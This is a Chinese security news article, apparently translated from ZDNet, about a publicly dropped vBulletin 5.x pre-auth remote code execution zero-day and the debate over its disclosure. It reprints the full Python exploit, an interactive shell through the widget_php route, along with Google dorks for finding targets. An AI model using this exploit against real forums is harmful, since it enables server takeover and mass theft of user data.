一名匿名研究员公开了当前最热门的互联网论坛软件 vBulletin 中的一个 0day 漏洞。安全研究人员担心公开未修复的这个0day可能掀起对互联网论坛的攻击,从而导致黑客接管论坛并批量窃取用户信息。

0day 详情

根据对所公开代码的分析来看,这个 0day 可导致攻击者在运行 vBulletin 程序的服务器上执行 shell 命令,而攻击者无需在具有目标论坛的账户。也就是说这是一个“预身份验证的远程代码执行”漏洞,是能够对 web 平台造成最严重影响的安全缺陷类型之一。

ZDNet 从两个不同的来源验证了这个0day 的效果。

蓄意公开?未及时修复?

该 0day漏洞的详情已遭公开,利用代码如下:

    !/usr/bin/python## vBulletin 5.x 0day pre-auth RCE exploit# # This should work on all versions from 5.0.0 till 5.5.4## Google Dorks:# - site:*.vbulletin.net# - "Powered by vBulletin Version 5.5.4"import requestsimport sysif len(sys.argv) != 2: sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])params = {"routestring":"ajax/render/widget_php"}whileTrue: try: cmd = raw_input("vBulletin$ ") params["widgetConfig[code]"] = "echo shell_exec(""+cmd+""); exit;" r = requests.post(url = sys.argv[1], data = params) if r.status_code == 200: print r.text else: sys.exit("Exploit failed! :(") except KeyboardInterrupt: sys.exit("\nClosing shell...") except Exception, e: sys.exit(str(e))

    当厂商未能修复私下报告的漏洞时研究人员选择公开未修复漏洞详情的做法并不少见。

    不过截止本文发稿前,尚不清楚这名匿名研究人员是否将漏洞告知 vBulletin 团队,或者 vBulletin 团队是否因为未能及时解决该问题而导致研究人员将其公开。

    运营vBulletin 论坛商用软件的公司 MH Sub I.LLC 尚未就此事置评。

    另外,这种行为可能是恶意的或蓄意破坏的行为,目的是为了损坏该公司的名誉并将消费者置于风险之中。这名匿名研究员通过匿名的邮件服务公开了关于这个0day的详情,而并未披露其真实的邮件地址,因此无法获取进一步详情。

    数万个论坛易受攻击

    尽管vBulletin 是一款商用产品,但它仍然是最热门的 web 论坛软件包,其市场份额要大于多种开源的解决方案如 phpBB、XenForo、Simple Machines Forum、MyBB等。

    W3Techs 表示,大约 0.1%的互联网网站都运行着 vBulletin 论坛。虽然这一比例看似较小,但实际上影响数亿互联网用户。因为从本质上来说,论坛旨在收集关于注册用户的信息。虽然数十亿个互联网站点并不存储任何用户信息,但少数在线论坛能够轻易地存储多数互联网用户的数据。因此,0.1%的市场份额实际上是非常大的比例,如果我们看到有多少名用户注册这些论坛。

    谷歌Docks资料显示,互联网上运行着数万个 vBulletin 论坛,它们或是自托管安装,或是在 vBulletin 的托管基础设施上运行。vBulletin 官网上列出了很多大客户如 Steam、EA、Zynga、NASA、Sony、BodyBuilding.com、the Huston Taxans和 Deven Broncos。

    唯一值得庆幸的消息是这个0day 仅影响 vBulletin 5.x 论坛版本。运行较早版本的论坛如果运行了最新的安全补丁,那么就是安全的。

    或最高值1万美元

    0day漏洞买卖商 Zerodium 也将vBulletin 远程代码执行漏洞列入收购计划。这是因为很多暗网论坛如提供犯罪服务于、恶意软件或虐童图片的网站通常在 vBulletin 论坛上运行,而这种利用类型可使执法部门访问这些非法论坛。

    从Zerodium 提供的价格表来看,这种预认证 RCE 漏洞可为这名匿名研究员带来至少1万美元的收入,前提是如果他当初联系了这家公司而非选择极端方式暴露这个 0day 将所有人的论坛数据都置于风险之中。

    原文链接

    https://www.zdnet.com/article/anonymous-researcher-drops-vbulletin-zero-day-impacting-tens-of-thousands-of-sites/

    声明:本文来自代码卫士,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。